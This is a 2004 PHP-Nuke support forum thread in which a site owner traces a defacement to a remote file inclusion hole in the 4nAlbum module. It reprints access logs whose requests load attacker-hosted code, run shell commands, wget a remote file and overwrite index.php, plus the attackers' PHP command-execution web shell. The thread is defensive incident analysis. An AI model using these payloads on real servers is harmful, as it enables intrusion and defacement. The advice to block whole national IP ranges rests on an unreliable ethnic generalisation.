Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
Author Message
ring_c
Involved
Involved


Joined: Dec 28, 2003
Posts: 276
Location: Israel

PostPosted: Fri Jun 04, 2004 4:36 am Reply with quote

Raven, could you tell me how they use these apps to change the index.php???
 
View user's profile Send private message Visit poster's website
ring_c
PostPosted: Fri Jun 04, 2004 4:37 am Reply with quote

stephen2417 wrote:
Well what a motto.. If you do get hacked again then its not an image gallery.. we have rulled that out then. Shocked

Right, i've removed all galeries, and any upload module (except for attach_mod in phpbb. don't tell me this one is suspected too!).
 
stephen2417
Worker
Worker


Joined: Jan 18, 2004
Posts: 244
Location: Bristolville, OH

PostPosted: Fri Jun 04, 2004 4:50 am Reply with quote

Hate to tell you but it very well could be the attachentt mod..

Dont go removing it just yet tho..
Heres a few tips. Find out how the hackers found your site.. By checking your webstats.
And then if you do find something odd then you may have your answer.

But hackers are odd you know.. You never know how they find your site.
Check over your server logs for that time when it was hacked, shouldnt be too had to pin point..

Its just a stab in the dark, im totaly guessing about the attachment mod.. It could be anything these days. You never know. Rolling Eyes
 
View user's profile Send private message Visit poster's website
Raven
Site Admin/Owner


Joined: Aug 27, 2002
Posts: 17077

PostPosted: Fri Jun 04, 2004 4:55 am Reply with quote

Look for a URI Requet String (values after the ? mark) that have something like

file=index.php
 
View user's profile Send private message
ring_c
PostPosted: Fri Jun 04, 2004 5:03 am Reply with quote

Raven, what about the error i get with the patched admin.php, as i wrote in the 1st page?
 
Raven
PostPosted: Fri Jun 04, 2004 5:10 am Reply with quote

No idea at this point. I would restore your files, disable all addons/apps that have file upload capability, and search your logs as I stated above. That will tell you how they are getting in.
 
chatserv
Member Emeritus


Joined: May 02, 2003
Posts: 1389
Location: Puerto Rico

PostPosted: Fri Jun 04, 2004 8:48 am Reply with quote

ring_c wrote:
Raven, I had a problem with the FIRST file I've uploaded. Sad
I've started with the root's admin.php file. after replacing (don't worry I have a backup) the file, i got this error:

Fatal error: Call to undefined function: stripos_clone() in /home/hagigim/public_html/admin.php on line 19

Now I'm realy afraid to continue...

The first file you should upload is mainfile.php
 
View user's profile Send private message Visit poster's website
ring_c
PostPosted: Fri Jun 04, 2004 9:25 am Reply with quote

chatserv wrote:
The first file you should upload is mainfile.php

That's what I thought too... so I've uploaded the admin directory plus the index.php, mainfile.php and other root files. with no vail...
So I removed the patched admin.php and now using the old admin.php.
 
ring_c
PostPosted: Fri Jun 04, 2004 9:26 am Reply with quote

Raven wrote:
Look for a URI Requet String (values after the ? mark) that have something like

file=index.php


I guess you meant url, right, to be found in the access logs. well, non of this was found... Confused
 
ring_c
PostPosted: Fri Jun 04, 2004 9:34 am Reply with quote

Here's something I've founf in my logs, aroung the time the index.php was changed. Does that mean anything to you?

    65.54.164.40 - - [03/Jun/2004:23:00:12 -0400] "GET /modules.php?name=4nAlbum HTTP/1.0" 200 37032 "-" "msnbot/0.11 (+http://search.msn.com/msnbot.htm)"
    200.181.94.89 - - [03/Jun/2004:23:12:09 -0400] "GET Only registered users can see links on this board! Get registered or login! HTTP/1.0" 200 1226 "http://www.hagigim.com/modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.webcindario.com/rf.txt?&cmd=id" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
    200.181.94.89 - - [03/Jun/2004:23:18:53 -0400] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.webcindario.com/rf.txt?&cmd=id;uname%20-a;pwd HTTP/1.1" 200 1409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    200.181.94.89 - - [03/Jun/2004:23:20:21 -0400] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.webcindario.com/rf.txt?&cmd=cd%20/home/hagigim/public_html;ls HTTP/1.1" 200 1771 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    200.181.94.89 - - [03/Jun/2004:23:20:38 -0400] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.webcindario.com/rf.txt?&cmd=cd%20/home/hagigim/public_html;wget%20www.dsuspect.hpg.com.br/you.txt HTTP/1.1" 200 1244 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    202.57.134.196 - - [03/Jun/2004:23:20:55 -0400] "GET Only registered users can see links on this board! Get registered or login! HTTP/1.1" 200 18647 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)"
    200.181.94.89 - - [03/Jun/2004:23:21:19 -0400] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.webcindario.com/rf.txt?&cmd=cd%20/home/hagigim/public_html;echo%20Rebellious%20Fingers%20-%20rebellious@end-war.com%20>%20index.php HTTP/1.1" 200 1236 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    200.181.94.89 - - [03/Jun/2004:23:21:31 -0400] "GET / HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    200.181.94.89 - - [03/Jun/2004:23:21:34 -0400] "GET / HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    200.181.94.89 - - [03/Jun/2004:23:21:58 -0400] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.50megs.com/cse.gif?&cmd=id;uname%20-a;pwd HTTP/1.1" 200 2770 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    200.181.94.89 - - [03/Jun/2004:23:22:07 -0400] "GET /favicon.ico HTTP/1.1" 404 4173 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    200.181.94.89 - - [03/Jun/2004:23:22:44 -0400] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.50megs.com/cse.gif?&cmd=cd%20/home/hagigim/public_html;echo%20Rebellious%20Fingers%20Defacements%20Crew!%20-%20rebellious@end-war.com%20>%20index.php HTTP/1.1" 200 2574 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    200.181.94.89 - - [03/Jun/2004:23:22:46 -0400] "GET / HTTP/1.1" 200 74 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    65.54.164.40 - - [03/Jun/2004:23:30:34 -0400] "GET /modules.php?name=Downloads HTTP/1.0" 200 30418 "-" "msnbot/0.11 (+http://search.msn.com/msnbot.htm)"
    200.181.94.89 - - [03/Jun/2004:23:31:31 -0400] "GET / HTTP/1.1" 200 74 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    200.181.94.89 - - [03/Jun/2004:23:31:53 -0400] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.50megs.com/cse.gif?&cmd=cd%20/home;ls HTTP/1.1" 200 2606 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    65.54.164.40 - - [03/Jun/2004:23:32:51 -0400] "GET /modules.php?name=Search&author=\xd7\x9e\xd7\xa0\xd7\x94\xd7\x9c%20\xd7\x94\xd7\x90\xd7\xaa\xd7\xa8 HTTP/1.0" 200 31164 "-" "msnbot/0.11 (+http://search.msn.com/msnbot.htm)"
    68.105.175.126 - - [04/Jun/2004:00:05:11 -0400] "GET /modules/Forums/images/avatars/Risque/fhffl108.jpg HTTP/1.1" 200 2239 "http://www.portedmods.com/ftopicp-10323.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
    80.12.161.55 - - [04/Jun/2004:00:09:27 -0400] "GET /hebnuker/modules/Forums/images/avatars/Buffy%20the%20Vampire%20Slayer/buffy3.jpg HTTP/1.1" 404 4173 "http://p206.ezboard.com/fdawsonscreekfansfrm7" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90; FunWebProducts)"
    217.132.249.95 - - [04/Jun/2004:00:10:20 -0400] "-" 408 - "-" "-"
    217.132.249.95 - - [04/Jun/2004:00:10:20 -0400] "-" 408 - "-" "-"
    217.132.249.95 - - [04/Jun/2004:00:10:20 -0400] "-" 408 - "-" "-"
    217.132.249.95 - - [04/Jun/2004:00:10:20 -0400] "-" 408 - "-" "-"
    217.132.249.95 - - [04/Jun/2004:00:10:20 -0400] "-" 408 - "-" "-"
    64.229.115.242 - - [04/Jun/2004:00:10:49 -0400] "GET /hebnuker/modules/Forums/images/avatars/Unicorns/Uni44.gif HTTP/1.1" 404 4173 "http://everlastworld.customcdrom.de/board/viewtopic.php?t=1770" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
    82.166.156.187 - - [04/Jun/2004:00:11:20 -0400] "GET /hebnuker/modules.php?name=Forums&file=index HTTP/1.1" 404 4173 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Hotbar 4.4.2.0; FunWebProducts)"
    217.132.249.95 - - [04/Jun/2004:00:11:21 -0400] "-" 408 - "-" "-"
    217.132.249.95 - - [04/Jun/2004:00:11:21 -0400] "-" 408 - "-" "-"
    217.132.249.95 - - [04/Jun/2004:00:11:21 -0400] "-" 408 - "-" "-"
    82.166.156.187 - - [04/Jun/2004:00:12:01 -0400] "GET /hebnuker/modules.php?name=Forums&file=index HTTP/1.1" 404 4173 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Hotbar 4.4.2.0; FunWebProducts)"


1. What's that msnbot?
2. what's that line meaning
Code:
217.132.249.95 - - [04/Jun/2004:00:10:20 -0400] "-" 408 - "-" "-"
?
3.
 
oprime2001
Worker
Worker


Joined: Jun 04, 2004
Posts: 119
Location: Chicago IL USA

PostPosted: Fri Jun 04, 2004 12:45 pm Reply with quote

Code:


200.181.94.89 - - [03/Jun/2004:23:12:09 -0400] "GET http://www.hagigim.com/modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.webcindario.com/rf.txt?&cmd=id HTTP/1.0" 200 1226 "http://www.hagigim.com/modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.webcindario.com/rf.txt?&cmd=id" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
200.181.94.89 - - [03/Jun/2004:23:18:53 -0400] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.webcindario.com/rf.txt?&cmd=id;uname%20-a;pwd HTTP/1.1" 200 1409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.181.94.89 - - [03/Jun/2004:23:20:21 -0400] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.webcindario.com/rf.txt?&cmd=cd%20/home/hagigim/public_html;ls HTTP/1.1" 200 1771 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.181.94.89 - - [03/Jun/2004:23:20:38 -0400] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.webcindario.com/rf.txt?&cmd=cd%20/home/hagigim/public_html;wget%20www.dsuspect.hpg.com.br/you.txt HTTP/1.1" 200 1244 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.181.94.89 - - [03/Jun/2004:23:21:19 -0400] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.webcindario.com/rf.txt?&cmd=cd%20/home/hagigim/public_html;echo%20Rebellious%20Fingers%20-%20rebellious@end-war.com%20>%20index.php HTTP/1.1" 200 1236 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.181.94.89 - - [03/Jun/2004:23:21:31 -0400] "GET / HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.181.94.89 - - [03/Jun/2004:23:21:34 -0400] "GET / HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.181.94.89 - - [03/Jun/2004:23:21:58 -0400] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.50megs.com/cse.gif?&cmd=id;uname%20-a;pwd HTTP/1.1" 200 2770 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.181.94.89 - - [03/Jun/2004:23:22:07 -0400] "GET /favicon.ico HTTP/1.1" 404 4173 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.181.94.89 - - [03/Jun/2004:23:22:44 -0400] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.50megs.com/cse.gif?&cmd=cd%20/home/hagigim/public_html;echo%20Rebellious%20Fingers%20Defacements%20Crew!%20-%20rebellious@end-war.com%20>%20index.php HTTP/1.1" 200 2574 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.181.94.89 - - [03/Jun/2004:23:22:46 -0400] "GET / HTTP/1.1" 200 74 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.181.94.89 - - [03/Jun/2004:23:31:31 -0400] "GET / HTTP/1.1" 200 74 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.181.94.89 - - [03/Jun/2004:23:31:53 -0400] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.50megs.com/cse.gif?&cmd=cd%20/home;ls HTTP/1.1" 200 2606 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

Look at the lines that start with 200. First, these are Brazilian IPs << notorious for hack attempts. Second, if you look at these lines closely, they are using a vulnerability in your 4nAlbum module to access a file on another server. They are then using http :// failiture.webcindario.com/rf.txt to execute commands on your server.
I don't use 4nAlbum myself, so I cannot direct you to updates. But I would bet that the problem in this instance is 4nAlbum. Hope that helps.

BTW, I took a look at that rf.txt file; here's what's in it.
Code:
<br><font face="verdana" size="2"><center><b>CMD</b> - Rebellious Fingers - We'are: Ackstr0n_X - D3m0n_suspect - Failiture<br></center></font><font face="Verdana" size="1"></center><br>

<b>#</b> CMD PHP : <br>
<b>#</b> Released by : <b>Rebellious Fingers - We'are: Ackstr0n_X - D3m0n_suspect - Failiture</b><br>
<br>
<br>
<hr color="black" width=751px height=115px>
<br>
<pre><font face="Verdana" size="1">
<?
  // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
  if (isset($chdir)) @chdir($chdir);
  ob_start();
  system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
  $output = ob_get_contents();
  ob_end_clean();
  if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?>
</font></pre>
<br>
<hr color="black" width=751px height=115px>
<br>
<font face="Verdana" size="1"><b>#RF</b><br><b>@ </b>irc.brasnet.org<br><b># </b> Only registered users can see links on this board! Get registered or login! face="verdana" size="1"> Rebellious Fingers - We'are: Ackstr0n_X - D3m0n_suspect - Failiture ::
</font></p>
 
View user's profile Send private message
ring_c
PostPosted: Sat Jun 05, 2004 1:38 pm Reply with quote

Thanks, oprime2001.
I've removed 4nAlbum on Friday already.
Do you think I should also ban Brazilian IP from accessing the site?

Oh, and how can you tell wether an IP is Brazilian or other?
 
oprime2001
PostPosted: Sat Jun 05, 2004 4:21 pm Reply with quote

ring_c wrote:
Thanks, oprime2001.
I've removed 4nAlbum on Friday already.
Do you think I should also ban Brazilian IP from accessing the site?

Oh, and how can you tell wether an IP is Brazilian or other?

I use Only registered users can see links on this board! Get registered or login! to help identify visitors. You can also use IP-to-country databases (e.g. Only registered users can see links on this board! Get registered or login!) if you want to check specific IP addresses.

As for banning all Brazilian IPs, that's up to you. After getting defaced twice in one month from Brazilian IPs, and since my sites are not geared towards Brazilians anyways, I've personally banned all 200. IP addresses using .htaccess file. Hope that helps.
 
ring_c
PostPosted: Sat Jun 05, 2004 4:24 pm Reply with quote

oprime2001 wrote:
As for banning all Brazilian IPs, that's up to you. After getting defaced twice in one month from Brazilian IPs, and since my sites are not geared towards Brazilians anyways, I've personally banned all 200. IP addresses using .htaccess file. Hope that helps.

Could you please detail how one should do it in the proper manner?
TIA!
 
Raven
PostPosted: Sat Jun 05, 2004 5:08 pm Reply with quote

Add this line to .htaccess

Deny from 200
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©